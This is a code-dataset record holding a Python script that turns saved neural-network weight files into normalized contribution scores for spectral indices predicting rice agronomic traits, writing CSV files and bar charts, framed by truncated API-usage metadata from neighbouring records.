{"api_name": "flask.render_template", "line_number": 329, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 326, "usage_type": "call"}, {"api_name": "app.app", "line_number": 326, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 332, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 335, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 336, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 330, "usage_type": "call"}, {"api_name": "app.app", "line_number": 330, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 340, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 340, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 338, "usage_type": "call"}, {"api_name": "app.app", "line_number": 338, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 343, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 341, "usage_type": "call"}, {"api_name": "app.app", "line_number": 341, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 346, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 346, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 344, "usage_type": "call"}, {"api_name": "app.app", "line_number": 344, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 351, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 351, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 348, "usage_type": "call"}, {"api_name": "app.app", "line_number": 348, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 354, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 354, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 355, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 355, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 359, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 360, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 360, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 352, "usage_type": "call"}, {"api_name": "app.app", "line_number": 352, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 363, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 363, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 364, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 364, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 368, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 369, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 369, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 361, "usage_type": "call"}, {"api_name": "app.app", "line_number": 361, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 372, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 372, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 373, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 373, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 374, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 374, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 378, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 378, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 370, "usage_type": "call"}, {"api_name": "app.app", "line_number": 370, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 381, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 381, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 383, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 383, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 384, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 384, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 385, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 385, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 387, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 387, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 388, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 379, "usage_type": "call"}, {"api_name": "app.app", "line_number": 379, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 392, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 392, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 395, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 395, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 397, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 397, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 398, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 398, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 399, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 399, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 400, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 400, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 401, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 401, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 403, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 403, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 406, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 406, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 407, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 390, "usage_type": "call"}, {"api_name": "app.app", "line_number": 390, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 412, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 412, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 414, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 414, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 415, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 415, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 416, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 410, "usage_type": "call"}, {"api_name": "app.app", "line_number": 410, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 421, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 421, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 423, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 423, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 423, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 424, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 424, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 424, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 425, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 425, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 425, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 426, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 426, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 426, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 427, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 427, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 427, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 428, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 428, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 428, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 429, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 429, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 429, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 430, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 430, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 430, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 431, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 431, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 432, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 432, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 433, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 433, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 433, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 434, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 434, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 434, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 435, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 435, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 435, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 436, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 436, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 436, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 437, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 437, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 437, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 439, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 439, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 440, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 419, "usage_type": "call"}, {"api_name": "app.app", "line_number": 419, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 444, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 444, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 446, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 446, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 446, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 447, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 447, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 447, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 449, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 449, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 450, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 442, "usage_type": "call"}, {"api_name": "app.app", "line_number": 442, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 454, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 454, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 456, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 456, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 456, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 458, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 458, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 459, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 452, "usage_type": "call"}, {"api_name": "app.app", "line_number": 452, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 463, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 463, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 465, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 465, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 465, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 466, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 466, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 466, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 467, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 467, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 467, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 468, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 468, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 468, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 469, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 469, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 469, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 470, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 470, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 470, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 471, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 471, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 471, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 473, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 473, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 474, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 461, "usage_type": "call"}, {"api_name": "app.app", "line_number": 461, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 479, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 479, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 476, "usage_type": "call"}, {"api_name": "app.app", "line_number": 476, "usage_type": "name"}]} +{"seq_id": "80679479", "text": "import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.metrics import r2_score,mean_squared_error,mean_absolute_error\nfrom sklearn.preprocessing import MinMaxScaler\nimport csv\nimport math\nimport os\n\n\npath_list = [\"results/rs/input/adaptive/\", \"results/rs/input/fixed/\",\n \"results/ss/input/adaptive/\", \"results/ss/input/fixed/\"]\n\nsave_to = [\"rs/adaptive/\", \"rs/fixed/\",\n \"ss/adaptive/\", \"ss/fixed/\"]\n\nmodels = [\"25\",\"45\",\"99\"]\n\nfor i in range(len(path_list)):\n for j in range(1,4):\n if j == 3:\n weight_files = 10\n else:\n weight_files = 4\n print(\"=========>\",j)\n print(path_list[i]+models[j-1])\n\n if j == 1:\n upper = 2\n else:\n upper = 4\n\n for jj in range(1,upper):\n freq = []\n best_labels = []\n for k in range(weight_files):\n\n dataset_file = \"avg_indices_reflectance_1617.csv\"\n dataset = pd.read_csv(dataset_file, header = 0)\n dataset_labels = list(dataset.columns.values)\n\n lab25 = dataset_labels[8:47]\n lab31 = dataset_labels[47:86]\n lab45 = dataset_labels[86:125]\n\n\n target_file = \"Rice_AgronomicTraits_1617.csv\"\n target = pd.read_csv(target_file, header = 0)\n target_labels = list(target.columns.values)\n target25 = target_labels[8:12]\n target45 = target_labels[16:20]\n target99 = target_labels[20:len(target_labels)]\n\n targets = [target25]\n targets.append(target45)\n targets.append(target99)\n\n sample_file = path_list[i]+models[j-1]+\"/Weights_model\"+str(jj)+\"_\"+str(k)+\".csv\"\n sample = pd.read_csv(sample_file, header = None)\n sample_data = sample._get_numeric_data()\n sample_np = sample_data[0:40].as_matrix()\n sample_np = np.asarray(sample_np)\n\n weights = sample_np\n\n \"\"\"\n indexes = np.zeros((weights.shape))\n threshold = 0.95\n for idx1 in range(weights.shape[0]):\n sum = 0\n temp1 = weights[idx1,:]\n temp2 = sorted(temp1, reverse = True)\n idx2 = 0\n while sum < 0.95:\n sum = sum + temp2[idx2]\n idx2 = idx2 + 1\n for ll in range(idx2):\n index = np.where(temp1 == temp2[ll])\n for lll in range(index[0].shape[0]):\n indexes[idx1,index[lll]] = 1\n\n for idx1 in range(weights.shape[0]):\n for idx2 in range(weights.shape[1]):\n if indexes[idx1,idx2] == 0:\n weights[idx1,idx2] = 0\n\n frequency = np.zeros(weights.shape[1])\n for idx1 in range(len(frequency)):\n frequency[idx1] = np.sum(indexes[:,idx1])\n \"\"\"\n frequency = np.zeros(weights.shape[1])\n for col in range(weights.shape[1]):\n sum = 0\n for row in range(weights.shape[0]):\n sum = sum + weights[row,col]\n\n frequency[col] = sum\n scaler = MinMaxScaler()\n\n frequency = np.asarray(frequency).reshape(-1,1)\n frequency = scaler.fit_transform(frequency).T\n frequency = frequency.reshape(-1,)\n for ll in range(frequency.shape[0]):\n frequency[ll] = round(frequency[ll],3)\n\n data = weights\n with open('weights/'+save_to[i]+models[j-1] + '/New_weights'+str(jj)+'_'+ str(k) + '.csv', 'w+') as csvFile:\n writer = csv.writer(csvFile,delimiter=',')\n writer.writerows(data)\n writer.writerow(frequency)\n csvFile.close()\n\n f1 = np.zeros(weights.shape[1])\n f2 = np.zeros(weights.shape[1])\n thres = 0.75\n error = 1e-2\n\n indexes = []\n for ll in range(frequency.shape[0]):\n if frequency[ll]>thres-error:\n f1[ll] = frequency[ll]\n indexes.append(ll)\n else:\n f2[ll] = frequency[ll]\n\n labels = []\n if jj == 1:\n labels = lab25\n labels.append('Whole_set')\n\n plt.bar(range(0,len(f1)),f1, tick_label = labels, color = \"green\")\n plt.bar(range(0,len(f2)),f2, tick_label = labels, color = \"#CC0000\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.title(targets[j-1][k])\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'.png', bbox_inches='tight')\n plt.clf()\n\n elif jj == 2:\n\n labels = np.concatenate((lab25,lab45), axis = 0)\n labels = labels.tolist()\n labels.append('Whole_set')\n\n plt.bar(range(0,39),f1[0:39], tick_label = labels[0:39], color = \"green\")\n plt.bar(range(0,39),f2[0:39], tick_label = labels[0:39], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_a\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'a.png', bbox_inches='tight')\n plt.clf()\n\n plt.bar(range(39,79),f1[39:79], tick_label = labels[39:79], color = \"green\")\n plt.bar(range(39,79),f2[39:79], tick_label = labels[39:79], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_b\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'b.png', bbox_inches='tight')\n plt.clf()\n\n elif jj == 3:\n labels = np.concatenate((lab25,lab31,lab45), axis = 0)\n labels = labels.tolist()\n labels.append('Whole_set')\n\n plt.bar(range(0,39),f1[0:39], tick_label = labels[0:39], color = \"green\")\n plt.bar(range(0,39),f2[0:39], tick_label = labels[0:39], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_a\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'a.png', bbox_inches='tight')\n plt.clf()\n\n plt.bar(range(39,79),f1[39:79], tick_label = labels[39:79], color = \"green\")\n plt.bar(range(39,79),f2[39:79], tick_label = labels[39:79], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_b\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'b.png', bbox_inches='tight')\n plt.clf()\n\n plt.bar(range(79,118),f1[79:118], tick_label = labels[79:118], color = \"green\")\n plt.bar(range(79,118),f2[79:118], tick_label = labels[79:118], color = \"#CC0000\")\n plt.ylabel(\"Total contribution in current output\")\n plt.axhline(thres-error, color=\"grey\", linestyle = \"--\", label = 'threshold = '+str(thres)+'\\n(error: '+str(error)+')')\n plt.legend(loc = 0, fontsize = \"xx-small\")\n plt.xticks(rotation = 90, fontsize = 5)\n plt.title(targets[j-1][k]+\"_c\")\n plt.savefig('weights/'+save_to[i]+models[j-1] + '/Frequency'+str(jj)+'_'+ str(k)+'c.png', bbox_inches='tight')\n plt.clf()\n temp = []\n for idx in indexes:\n temp.append(labels[idx])\n best_labels.append([temp])\n freq.append(frequency)\n data = freq\n with open('weights/'+save_to[i] + '/Frequency_'+models[j-1]+'_'+str(jj)+'.csv', 'w+') as csvFile:\n writer = csv.writer(csvFile,delimiter=',')\n writer.writerow(labels)\n writer.writerows(data)\n csvFile.close()\n\n best_labels = np.asarray(best_labels)\n best_labels.reshape(-1,1)\n data = best_labels\n with open('weights/'+save_to[i] + '/Most_important_'+models[j-1]+'_'+str(jj)+'.csv', 'w+') as csvFile:\n writer = csv.writer(csvFile,delimiter=',')\n writer.writerows(data)\n csvFile.close()\n", "sub_path": "models/modelB/b/weight_calc.py", "file_name": "weight_calc.py", "file_ext": "py", "file_size_in_byte": 10375, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 101, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, 